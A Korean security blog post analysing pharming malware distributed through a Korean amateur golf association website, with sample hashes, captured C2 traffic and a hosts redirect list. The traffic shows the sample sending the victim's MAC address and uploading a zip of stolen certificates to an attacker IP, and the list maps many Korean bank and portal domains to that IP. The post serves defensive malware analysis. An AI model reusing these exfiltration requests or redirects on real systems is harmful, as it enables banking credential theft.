annyoung

한국아마추어골프협회 사이트에서 파밍 유포 본문

분석생활

한국아마추어골프협회 사이트에서 파밍 유포

nopsled 2015. 4. 19. 02:31



FileName 

 java.exe

MD5

 F92A5666EA36C16B839E87950E4D6ED9

SHA-1 

 55C32079EC63BC4D1A9E8FD33BA829E463EAB0B2

Packer

 PECompact 2.0x Heuristic Mode -> Jeremy Collake

exploit은 발견되지 않지만 바이너리는 유포되고 있다.




GET /fcg-bin/cgi_get_portrait.fcg?uins=2835357196?=31241 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: users.qzone.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: QZHTTP-2.37.1

Content-Encoding: gzip

Cache-Control: max-age=86400

Content-Type: text/html

Content-Length: 121

Date: Sat, 18 Apr 2015 16:36:34 GMT

Connection: keep-alive

Vary: Accept-Encoding


..........+./*)J.,qN..qJL...V2.065657.4S..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T240.343.37.3..J..j..|.O!|... 

users.qzone.qq.com에서 파밍 IP(107.163.72.38)를 받아온다.




Get /Count.asp?ver=001&mac=00-1C-42-55-3D-A4&31241 HTTP/1.1

Accept-Language: zh-CN

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: 180.150.226.26

Content-Length: 0

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: NetBox Version 2.8 Build 4128

Date: Sat, 18 Apr 2015 16:36:18 GMT

Connection: Keep-Alive

Set-Cookie: KBMCAJDSSKPSSMJGHMGK=DWAXCMPXKCPLDBTMWENVHUKBITCGRAXLKRBIJZMR; path=/

Cache-control: private

Content-Type: text/html

Content-Length: 3


...

감염자 기록(MAC Address) 전송







GET /ip.php?=6996 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: 107.163.72.38

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 18 Apr 2015 16:36:32 GMT

Server: Apache/2.2.4 (Win32) PHP/5.2.3

X-Powered-By: PHP/5.2.3

Content-Length: 32

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

Content-Language: ko


5b3412f55ff8ec4bd2a99b059084256dPOST /upload.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://107.163.72.38/upload.php

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314

Content-Length: 295

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 107.163.72.38

Cache-Control: no-cache


-----------------------------7da3e1bd0314

Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip"

Content-Type: application/x-zip-compressed


PK....................

-----------------------------7da3e1bd0314--

HTTP/1.1 200 OK

Date: Sat, 18 Apr 2015 16:36:34 GMT

Server: Apache/2.2.4 (Win32) PHP/5.2.3

X-Powered-By: PHP/5.2.3

Content-Length: 0

Content-Type: text/html;charset=utf-8

Content-Language: ko

역시나 다른 파밍에 다를것 없이 IP hash 후엔 인증서 유출





기본, 보조 DNS 역시 127.0.0.1로 변경하여 자신의 컴퓨터가 DNS서버 역할을 함.




서버는 APM. 역시나 Host변조 후 접속시엔 네이버가 뜬다.




갛ㅈ...? 강한 그건가...(농담...)

그냥 감염자가 562명이라 이거 같다.





107.163.72.38 daum.net

107.163.72.38 www.daum.net

107.163.72.38 www.zum.com

107.163.72.38 openbank.cu.co.kr.kr

107.163.72.38 www.cu.co.kr.r

107.163.72.38 bank.cu.co.kr

107.163.72.38 www.cu.co.kr

107.163.72.38 cu.co.kr

107.163.72.38 www.busanbank.co.kr

107.163.72.38 busanbank.co.kr

107.163.72.38 www.busanbank.co.kr.kr

107.163.72.38 www.citibank.co.kr.kr

107.163.72.38 www.citibank.co.kr

107.163.72.38 citibank.co.kr

107.163.72.38 ctbank.co.kr

107.163.72.38 www.dgb.co.kr

107.163.72.38 dgb.co.kr

107.163.72.38 banking.dgb.co.kr

107.163.72.38 www.dgb.co.kr.r

107.163.72.38 www.knbnak.co.kr

107.163.72.38 www.knbank.co.kr.kr

107.163.72.38 www.knbeasy.com

107.163.72.38 kibs.knbank.co.kr

107.163.72.38 www.knbank.co.kr.r

107.163.72.38 www.suhyup-bank.com.kr

107.163.72.38 suhyup-bank.com

107.163.72.38 www.suhyup.co.kr

107.163.72.38 suhyup.co.kr

107.163.72.38 biz.suhyup-bank.co.kr

107.163.72.38 biz.suhyup-bank.com

107.163.72.38 www.sushyup.co.kr.r

107.163.72.38 www.kjbank.com.kr

107.163.72.38 www.kjbank.com

107.163.72.38 kjbank.com

107.163.72.38 smile.kjbank.com

107.163.72.38 jbbank.co.kr

107.163.72.38 www.jbbank.co.kr

107.163.72.38 ibs.jbbank.co.kr

107.163.72.38 www.jbbank.co.kr.r

107.163.72.38 www.kdb.co.kr.r

107.163.72.38 www.kdb.co.kr

107.163.72.38 kdb.co.kr

107.163.72.38 direct.kdb.co.kr

107.163.72.38 ib.scfirstbank.com

107.163.72.38 www.sc.co.kr

107.163.72.38 sc.co.kr

107.163.72.38 nate.com

107.163.72.38 www.nate.com

107.163.72.38 hanmail.net

107.163.72.38 www.hanmail.net

107.163.72.38 www.zum.com

svchost.exe가 DNS 서버 역할을 하게 되며 해당 사이트들을 107.163.72.38로 리다이렉션 시킨다.

저작자표시 비영리

'분석생활' 카테고리의 다른 글

TLS callback 악성코드 우회 및 분석  (0) 2015.05.19
남일물산 사이트에서 파밍 유포중  (0) 2015.04.20
대구주얼리RIS사업단 사이트에서 파밍 유포중  (0) 2015.04.18
풋볼데이 매크로 바이러스 탐지?  (2) 2015.04.18
해외쇼핑몰 크리겟에서 파밍 유포중  (0) 2015.04.18
'분석생활' Related Articles more
Comments